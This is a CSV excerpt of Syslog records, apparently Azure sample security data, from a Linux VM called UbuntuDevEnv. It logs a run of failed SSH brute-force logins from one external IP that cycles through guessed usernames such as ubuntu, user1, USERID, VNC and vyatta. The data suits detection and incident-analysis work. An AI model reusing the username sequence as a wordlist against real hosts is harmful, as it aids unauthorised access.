+3273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:40,UbuntuDevEnv,2019-06-28 05:30:40,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 193.201.224.232 port 32012 ssh2,96694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,193.201.224.2,32012,,
+3274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:42,UbuntuDevEnv,2019-06-28 05:30:41,auth,UbuntuDevEnv,info,"Disconnecting invalid user ubuntu 193.201.224.232 port 32012: Change of username or service not allowed: (ubuntu,ssh-connection) -> (user1,ssh-connection) [preauth]",96694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,193.201.224.2,32012,,
+3275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:43,UbuntuDevEnv,2019-06-28 05:30:42,auth,UbuntuDevEnv,info,Invalid user user1 from 193.201.224.232 port 42996,96784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user1,193.201.224.2,42996,,
+3276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:43,UbuntuDevEnv,2019-06-28 05:30:42,auth,UbuntuDevEnv,info,Failed none for invalid user user1 from 193.201.224.232 port 42996 ssh2,96784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user1,193.201.224.2,42996,,
+3277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:43,UbuntuDevEnv,2019-06-28 05:30:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:43,UbuntuDevEnv,2019-06-28 05:30:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:45,UbuntuDevEnv,2019-06-28 05:30:44,auth,UbuntuDevEnv,info,Failed password for invalid user user1 from 193.201.224.232 port 42996 ssh2,96784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user1,193.201.224.2,42996,,
+3280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:47,UbuntuDevEnv,2019-06-28 05:30:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:50,UbuntuDevEnv,2019-06-28 05:30:49,auth,UbuntuDevEnv,info,Failed password for invalid user user1 from 193.201.224.232 port 42996 ssh2,96784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user1,193.201.224.2,42996,,
+3282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:51,UbuntuDevEnv,2019-06-28 05:30:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:53,UbuntuDevEnv,2019-06-28 05:30:52,auth,UbuntuDevEnv,info,Failed password for invalid user user1 from 193.201.224.232 port 42996 ssh2,96784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user1,193.201.224.2,42996,,
+3284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:53,UbuntuDevEnv,2019-06-28 05:30:52,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:53,UbuntuDevEnv,2019-06-28 05:30:52,auth,UbuntuDevEnv,info,"Disconnecting invalid user user1 193.201.224.232 port 42996: Change of username or service not allowed: (user1,ssh-connection) -> (USERID,ssh-connection) [preauth]",96784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user1,193.201.224.2,42996,,
+3286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:54,UbuntuDevEnv,2019-06-28 05:30:53,auth,UbuntuDevEnv,info,Invalid user USERID from 193.201.224.232 port 14068,96823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,USERID,193.201.224.2,14068,,
+3287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:54,UbuntuDevEnv,2019-06-28 05:30:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:54,UbuntuDevEnv,2019-06-28 05:30:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:55,UbuntuDevEnv,2019-06-28 05:30:55,auth,UbuntuDevEnv,info,Failed password for invalid user USERID from 193.201.224.232 port 14068 ssh2,96823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,USERID,193.201.224.2,14068,,
+3290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:56,UbuntuDevEnv,2019-06-28 05:30:55,auth,UbuntuDevEnv,info,"Disconnecting invalid user USERID 193.201.224.232 port 14068: Change of username or service not allowed: (USERID,ssh-connection) -> (username,ssh-connection) [preauth]",96823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,USERID,193.201.224.2,14068,,
+3291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:59,UbuntuDevEnv,2019-06-28 05:30:59,auth,UbuntuDevEnv,info,Invalid user username from 193.201.224.232 port 16827,96841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,username,193.201.224.2,16827,,
+3292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:59,UbuntuDevEnv,2019-06-28 05:30:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:30:59,UbuntuDevEnv,2019-06-28 05:30:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:01,UbuntuDevEnv,2019-06-28 05:31:01,auth,UbuntuDevEnv,info,Failed password for invalid user username from 193.201.224.232 port 16827 ssh2,96841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,username,193.201.224.2,16827,,
+3295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:04,UbuntuDevEnv,2019-06-28 05:31:04,auth,UbuntuDevEnv,info,"Disconnecting invalid user username 193.201.224.232 port 16827: Change of username or service not allowed: (username,ssh-connection) -> (usuario,ssh-connection) [preauth]",96841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,username,193.201.224.2,16827,,
+3296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:09,UbuntuDevEnv,2019-06-28 05:31:08,auth,UbuntuDevEnv,info,Invalid user usuario from 193.201.224.232 port 49843,96880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,usuario,193.201.224.2,49843,,
+3297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:09,UbuntuDevEnv,2019-06-28 05:31:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:09,UbuntuDevEnv,2019-06-28 05:31:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:11,UbuntuDevEnv,2019-06-28 05:31:10,auth,UbuntuDevEnv,info,Failed password for invalid user usuario from 193.201.224.232 port 49843 ssh2,96880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,usuario,193.201.224.2,49843,,
+3300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:12,UbuntuDevEnv,2019-06-28 05:31:12,auth,UbuntuDevEnv,info,"Disconnecting invalid user usuario 193.201.224.232 port 49843: Change of username or service not allowed: (usuario,ssh-connection) -> (vcr,ssh-connection) [preauth]",96880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,usuario,193.201.224.2,49843,,
+3301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:14,UbuntuDevEnv,2019-06-28 05:31:13,auth,UbuntuDevEnv,info,Invalid user vcr from 193.201.224.232 port 60546,96896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vcr,193.201.224.2,60546,,
+3302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:14,UbuntuDevEnv,2019-06-28 05:31:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:14,UbuntuDevEnv,2019-06-28 05:31:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:17,UbuntuDevEnv,2019-06-28 05:31:16,auth,UbuntuDevEnv,info,Failed password for invalid user vcr from 193.201.224.232 port 60546 ssh2,96896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vcr,193.201.224.2,60546,,
+3305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:17,UbuntuDevEnv,2019-06-28 05:31:16,auth,UbuntuDevEnv,info,"Disconnecting invalid user vcr 193.201.224.232 port 60546: Change of username or service not allowed: (vcr,ssh-connection) -> (VNC,ssh-connection) [preauth]",96896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vcr,193.201.224.2,60546,,
+3306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:17,UbuntuDevEnv,2019-06-28 05:31:17,auth,UbuntuDevEnv,info,Invalid user VNC from 193.201.224.232 port 13320,96910,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,VNC,193.201.224.2,13320,,
+3307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:17,UbuntuDevEnv,2019-06-28 05:31:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96910,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:17,UbuntuDevEnv,2019-06-28 05:31:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96910,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:19,UbuntuDevEnv,2019-06-28 05:31:19,auth,UbuntuDevEnv,info,Failed password for invalid user VNC from 193.201.224.232 port 13320 ssh2,96910,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,VNC,193.201.224.2,13320,,
+3310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:19,UbuntuDevEnv,2019-06-28 05:31:19,auth,UbuntuDevEnv,info,"Disconnecting invalid user VNC 193.201.224.232 port 13320: Change of username or service not allowed: (VNC,ssh-connection) -> (volition,ssh-connection) [preauth]",96910,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,VNC,193.201.224.2,13320,,
+3311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:23,UbuntuDevEnv,2019-06-28 05:31:23,auth,UbuntuDevEnv,info,Invalid user volition from 193.201.224.232 port 25191,96934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,volition,193.201.224.2,25191,,
+3312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:24,UbuntuDevEnv,2019-06-28 05:31:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:24,UbuntuDevEnv,2019-06-28 05:31:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:26,UbuntuDevEnv,2019-06-28 05:31:25,auth,UbuntuDevEnv,info,Failed password for invalid user volition from 193.201.224.232 port 25191 ssh2,96934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,volition,193.201.224.2,25191,,
+3315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:27,UbuntuDevEnv,2019-06-28 05:31:27,auth,UbuntuDevEnv,info,"Disconnecting invalid user volition 193.201.224.232 port 25191: Change of username or service not allowed: (volition,ssh-connection) -> (vt100,ssh-connection) [preauth]",96934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,volition,193.201.224.2,25191,,
+3316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:28,UbuntuDevEnv,2019-06-28 05:31:27,auth,UbuntuDevEnv,info,Invalid user vt100 from 193.201.224.232 port 35492,96956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vt100,193.201.224.2,35492,,
+3317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:28,UbuntuDevEnv,2019-06-28 05:31:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:28,UbuntuDevEnv,2019-06-28 05:31:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:30,UbuntuDevEnv,2019-06-28 05:31:29,auth,UbuntuDevEnv,info,Failed password for invalid user vt100 from 193.201.224.232 port 35492 ssh2,96956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vt100,193.201.224.2,35492,,
+3320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:30,UbuntuDevEnv,2019-06-28 05:31:30,auth,UbuntuDevEnv,info,"Disconnecting invalid user vt100 193.201.224.232 port 35492: Change of username or service not allowed: (vt100,ssh-connection) -> (VTech,ssh-connection) [preauth]",96956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vt100,193.201.224.2,35492,,
+3321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:34,UbuntuDevEnv,2019-06-28 05:31:34,auth,UbuntuDevEnv,info,Invalid user VTech from 193.201.224.232 port 37758,96968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,VTech,193.201.224.2,37758,,
+3322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:35,UbuntuDevEnv,2019-06-28 05:31:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:35,UbuntuDevEnv,2019-06-28 05:31:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:37,UbuntuDevEnv,2019-06-28 05:31:37,auth,UbuntuDevEnv,info,Failed password for invalid user VTech from 193.201.224.232 port 37758 ssh2,96968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,VTech,193.201.224.2,37758,,
+3325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:37,UbuntuDevEnv,2019-06-28 05:31:37,auth,UbuntuDevEnv,info,"Disconnecting invalid user VTech 193.201.224.232 port 37758: Change of username or service not allowed: (VTech,ssh-connection) -> (vyatta,ssh-connection) [preauth]",96968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,VTech,193.201.224.2,37758,,
+3326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:45,UbuntuDevEnv,2019-06-28 05:31:44,auth,UbuntuDevEnv,info,Invalid user vyatta from 193.201.224.232 port 5573,96997,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vyatta,193.201.224.2,5573,,
+3327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:45,UbuntuDevEnv,2019-06-28 05:31:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96997,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:45,UbuntuDevEnv,2019-06-28 05:31:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96997,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:46,UbuntuDevEnv,2019-06-28 05:31:45,auth,UbuntuDevEnv,info,Failed password for invalid user vyatta from 193.201.224.232 port 5573 ssh2,96997,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vyatta,193.201.224.2,5573,,
+3330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:49,UbuntuDevEnv,2019-06-28 05:31:48,auth,UbuntuDevEnv,info,"Disconnecting invalid user vyatta 193.201.224.232 port 5573: Change of username or service not allowed: (vyatta,ssh-connection) -> (webadmin,ssh-connection) [preauth]",96997,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vyatta,193.201.224.2,5573,,
